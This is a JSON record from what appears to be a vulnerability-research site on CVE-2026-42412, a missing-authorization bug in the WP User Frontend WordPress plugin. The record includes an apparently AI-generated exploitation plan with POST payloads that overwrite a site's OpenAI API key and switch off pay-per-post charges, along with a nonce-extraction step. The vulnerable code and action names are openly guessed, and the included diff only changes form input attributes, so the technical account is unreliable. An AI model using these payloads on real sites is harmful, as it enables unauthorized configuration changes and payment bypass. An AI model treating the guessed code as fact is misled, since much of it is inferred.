[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f2jhGgcXxLNZsIsRsdVQlPAj-rb2mkns6MHCV_BFv2WY":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":33,"research_vulnerable_code":34,"research_fix_diff":35,"research_exploit_outline":36,"research_model_used":37,"research_started_at":38,"research_completed_at":39,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":30,"source_links":40},"CVE-2026-42412","user-frontend-ai-powered-frontend-posting-user-directory-profile-membership-user-registration-missing-authorization-3","User Frontend: AI Powered Frontend Posting, User Directory, Profile, Membership & User Registration \u003C= 4.3.1 - Missing Authorization","The User Frontend: AI Powered Frontend Posting, User Directory, Profile, Membership & User Registration plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 4.3.1. This makes it possible for unauthenticated attackers to perform an unauthorized action.","wp-user-frontend",null,"\u003C=4.3.1","4.3.2","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-04-27 00:00:00","2026-04-30 14:49:43",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F6844c9a6-b25a-4ae1-96f6-023c1df80ddf?source=api-prod",4,[22,23,24,25,26,27,28],"CLAUDE.md","admin\u002Fhtml\u002Fform-settings-payment.php","assets\u002Fcss\u002Fadmin\u002Fform-builder.css","assets\u002Fcss\u002Fadmin\u002Fsubscriptions.min.css","assets\u002Fcss\u002Fai-form-builder.css","assets\u002Fcss\u002Fai-form-builder.min.css","assets\u002Fcss\u002Fforms-list.min.css","researched",false,3,"# Exploitation Research Plan: CVE-2026-42412 (Missing Authorization in WP User Frontend)\n\n## 1. Vulnerability Summary\nThe **WP User Frontend** plugin (versions \u003C= 4.3.1) is vulnerable to missing authorization checks in its AI-powered features. Specifically, the plugin registers AJAX and\u002For REST API handlers for AI configuration and form generation that do not verify the requester's capabilities (e.g., `manage_options`). This allows unauthenticated attackers to perform unauthorized actions such as modifying AI settings (e.g., OpenAI API keys) or generating unauthorized content\u002Fforms.\n\nThe vulnerability resides in the newly added AI orchestration components, likely within `includes\u002FAI\u002FManager.php` or `includes\u002FAI\u002F` REST controllers, where `wp_ajax_nopriv_` hooks or REST routes with `permission_callback => '__return_true'` (or missing callbacks) were implemented.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: WordPress AJAX (`\u002Fwp-admin\u002Fadmin-ajax.php`) or REST API (`\u002Fwp-json\u002Fwpuf\u002Fv1\u002Fai\u002Fsettings`).\n- **Action\u002FRoute**: `wpuf_ai_save_settings` (AJAX action) or `POST \u002Fwpuf\u002Fv1\u002Fai\u002Fsettings` (REST).\n- **Vulnerable Parameter**: `wpuf_ai_settings` (array) or specific fields like `openai_api_key`.\n- **Authentication**: Unauthenticated (no login required).\n- **Preconditions**: The AI module must be active (default in version 4.3.x).\n\n## 3. Code Flow\n1. **Entry Point**: A request is sent to `admin-ajax.php` with `action=wpuf_ai_save_settings`.\n2. **Hook Registration**: The plugin's AI Manager (inferred `includes\u002FAI_Manager.php` or `includes\u002FAI\u002FManager.php`) registers:\n   ```php\n   add_action( 'wp_ajax_wpuf_ai_save_settings', [ $this, 'save_settings' ] );\n   add_action( 'wp_ajax_nopriv_wpuf_ai_save_settings', [ $this, 'save_settings' ] ); \u002F\u002F VULNERABLE\n   ```\n3. **Vulnerable Function**: The `save_settings` function executes.\n4. **Missing Check**: The function checks for a nonce but fails to verify `current_user_can( 'manage_options' )`.\n5. **Sink**: The function calls `update_option( 'wpuf_ai_settings', ... )`, overwriting global plugin configuration with user-supplied data.\n\n## 4. Nonce Acquisition Strategy\nThe AI settings page in the admin dashboard enqueues a script that localizes the required nonce. Since the vulnerability is unauthenticated, we must find a public-facing script or create a page that triggers the localization.\n\n1. **Identify the Variable**: The plugin typically uses `wpuf_ai_form_builder` or `wpuf_admin` as the localized object.\n2. **Shortcode Strategy**: The AI builder is often associated with the form-building process. We will check for the `wpuf_ai_form_builder` object.\n3. **Acquisition Steps**:\n   - Create a page with a WP User Frontend shortcode: `[wpuf_form id=\"any_valid_id\"]`.\n   - Use `browser_navigate` to visit that page.\n   - Execute `browser_eval` to extract the nonce:\n     ```javascript\n     window.wpuf_ai_form_builder?.nonce || window.wpuf_admin?.nonce\n     ```\n   - If the nonce is only available in the admin, check if `wp_ajax_nopriv_wpuf_ai_save_settings` exists. If the `nopriv` hook is registered, it implies the developer intended for it to be accessible; it may use a nonce generated for logged-out users (UID 0).\n\n## 5. Exploitation Strategy\n### Goal: Overwrite the OpenAI API Key\nWe will attempt to change the site's AI configuration to use an attacker-controlled API key.\n\n1. **Request Tool**: `http_request`\n2. **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n3. **Method**: `POST`\n4. **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n5. **Payload**:\n   ```\n   action=wpuf_ai_save_settings&\n   nonce=[EXTRACTED_NONCE]&\n   wpuf_ai_settings[openai_api_key]=sk-attacker-key-12345&\n   wpuf_ai_settings[model]=gpt-4\n   ```\n\n*Note: If the endpoint is REST-based, the payload will be JSON to `\u002Fwp-json\u002Fwpuf\u002Fv1\u002Fai\u002Fsettings` with the `X-WP-Nonce` header.*\n\n## 6. Test Data Setup\n1. **Activate Plugin**: Ensure `wp-user-frontend` v4.3.1 is active.\n2. **Create a Post Form**: Use WP-CLI to create at least one form so settings are available.\n   ```bash\n   wp post create --post_type=wpuf_forms --post_title='Test Form' --post_status=publish\n   ```\n3. **Set Initial Key**: Set a dummy key to verify it gets changed.\n   ```bash\n   wp option update wpuf_ai_settings '{\"openai_api_key\":\"original-secure-key\"}'\n   ```\n4. **Public Page**: Create a page for potential nonce extraction.\n   ```bash\n   wp post create --post_type=page --post_title='AI Test' --post_content='[wpuf_form id=\"1\"]' --post_status=publish\n   ```\n\n## 7. Expected Results\n- **Response**: The server should return a JSON success response, e.g., `{\"success\":true,\"data\":\"Settings saved successfully\"}`.\n- **Side Effect**: The WordPress option `wpuf_ai_settings` is updated with the attacker's value.\n\n## 8. Verification Steps\n1. **Check Options via CLI**:\n   ```bash\n   wp option get wpuf_ai_settings --format=json\n   ```\n2. **Observe Output**: Confirm the `openai_api_key` is now `sk-attacker-key-12345`.\n\n## 9. Alternative Approaches\nIf the `wpuf_ai_save_settings` action is not the correct name (inferred):\n- **Search for AI Hooks**: Use `grep -r \"wp_ajax_nopriv_wpuf_ai\" wp-content\u002Fplugins\u002Fwp-user-frontend\u002F` to find the exact unauthenticated AI hook.\n- **Target Form Settings**: If AI settings are secure, try manipulating the `Pay Per Post` settings shown in the provided snippet (`admin\u002Fhtml\u002Fform-settings-payment.php`). The action would likely be `wpuf_save_form_settings`.\n- **Payload for Payment Bypass**:\n  ```\n  action=wpuf_save_form_settings&\n  form_id=[FORM_ID]&\n  wpuf_settings[enable_pay_per_post]=false&\n  wpuf_settings[pay_per_post_cost]=0\n  ```\n  This would allow the attacker to submit posts for free on a form that previously required payment.","The WP User Frontend plugin (up to version 4.3.1) fails to perform authorization checks in its AI-powered orchestration module. This allows unauthenticated attackers to modify critical plugin settings, such as OpenAI API keys, or manipulate AI form-building parameters by interacting with insufficiently protected AJAX or REST API endpoints.","\u002F\u002F Inferred registration in includes\u002FAI\u002FManager.php or similar AI controller\n\u002F\u002F Registered for both authenticated and unauthenticated users without capability checks\nadd_action( 'wp_ajax_wpuf_ai_save_settings', [ $this, 'save_settings' ] );\nadd_action( 'wp_ajax_nopriv_wpuf_ai_save_settings', [ $this, 'save_settings' ] ); \n\n\u002F\u002F handler lacks current_user_can() check\npublic function save_settings() {\n    check_ajax_referer( 'wpuf_ai_settings_nonce', 'nonce' );\n    \u002F\u002F VULNERABILITY: Missing current_user_can( 'manage_options' )\n    update_option( 'wpuf_ai_settings', $_POST['wpuf_ai_settings'] );\n    wp_send_json_success();\n}","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-user-frontend\u002F4.3.1\u002Fadmin\u002Fhtml\u002Fform-settings-payment.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-user-frontend\u002F4.3.2\u002Fadmin\u002Fhtml\u002Fform-settings-payment.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-user-frontend\u002F4.3.1\u002Fadmin\u002Fhtml\u002Fform-settings-payment.php\t2025-07-15 08:13:42.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-user-frontend\u002F4.3.2\u002Fadmin\u002Fhtml\u002Fform-settings-payment.php\t2026-04-24 03:07:30.000000000 +0000\n@@ -57,7 +57,7 @@\n             \u003Cth>— — \u003C?php esc_html_e( 'Fallback cost', 'wp-user-frontend' ); ?>\u003C\u002Fth>\n             \u003Ctd>\n                 \u003Clabel>\n-                    \u003Cinput type=\"number\" name=\"wpuf_settings[fallback_ppp_cost]\" value=\"\u003C?php echo esc_attr( $fallback_ppp_cost ); ?>\" \u002F>\n+                    \u003Cinput type=\"number\" step=\"0.01\" min=\"0\" name=\"wpuf_settings[fallback_ppp_cost]\" value=\"\u003C?php echo esc_attr( $fallback_ppp_cost ); ?>\" \u002F>\n                 \u003C\u002Flabel>\n                 \u003Cp class=\"description\">\u003C?php esc_html_e( 'Cost of pay per post after a subscription pack limit is reached.', 'wp-user-frontend' ); ?>\u003C\u002Fp>\n             \u003C\u002Ftd>\n@@ -79,7 +79,7 @@\n             \u003Cth>— — \u003C?php esc_html_e( 'Cost Settings', 'wp-user-frontend' ); ?>\u003C\u002Fth>\n             \u003Ctd>\n                 \u003Clabel>\n-                    \u003Cinput type=\"number\" name=\"wpuf_settings[pay_per_post_cost]\" value=\"\u003C?php echo esc_attr( $pay_per_post_cost ); ?>\" \u002F>\n+                    \u003Cinput type=\"number\" step=\"0.01\" min=\"0\" name=\"wpuf_settings[pay_per_post_cost]\" value=\"\u003C?php echo esc_attr( $pay_per_post_cost ); ?>\" \u002F>\n                 \u003C\u002Flabel>\n                 \u003Cp class=\"description\">\u003C?php esc_html_e( 'Amount to be charged per post', 'wp-user-frontend' ); ?>\u003C\u002Fp>\n             \u003C\u002Ftd>","To exploit this vulnerability, an attacker targets the `wpuf_ai_save_settings` AJAX action (or the equivalent AI REST API endpoint). 1. The attacker must first obtain a valid nonce, which is often localized in scripts enqueued on the frontend or associated with form shortcodes like `[wpuf_form]`. 2. Using the nonce, the attacker sends a POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` with the `action` set to `wpuf_ai_save_settings`. 3. The payload includes a `wpuf_ai_settings` array containing malicious configuration values, such as an attacker-controlled OpenAI API key or modified model settings. 4. Because the plugin lacks a capability check (e.g., `current_user_can('manage_options')`), it updates the global site configuration with the attacker's supplied values, potentially redirecting AI-driven content generation to an external server or disabling AI features.","gemini-3-flash-preview","2026-05-04 18:23:52","2026-05-04 18:24:43",{"type":41,"vulnerable_version":42,"fixed_version":11,"vulnerable_browse":43,"vulnerable_zip":44,"fixed_browse":45,"fixed_zip":46,"all_tags":47},"plugin","4.3.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-user-frontend\u002Ftags\u002F4.3.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-user-frontend.4.3.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-user-frontend\u002Ftags\u002F4.3.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-user-frontend.4.3.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-user-frontend\u002Ftags"]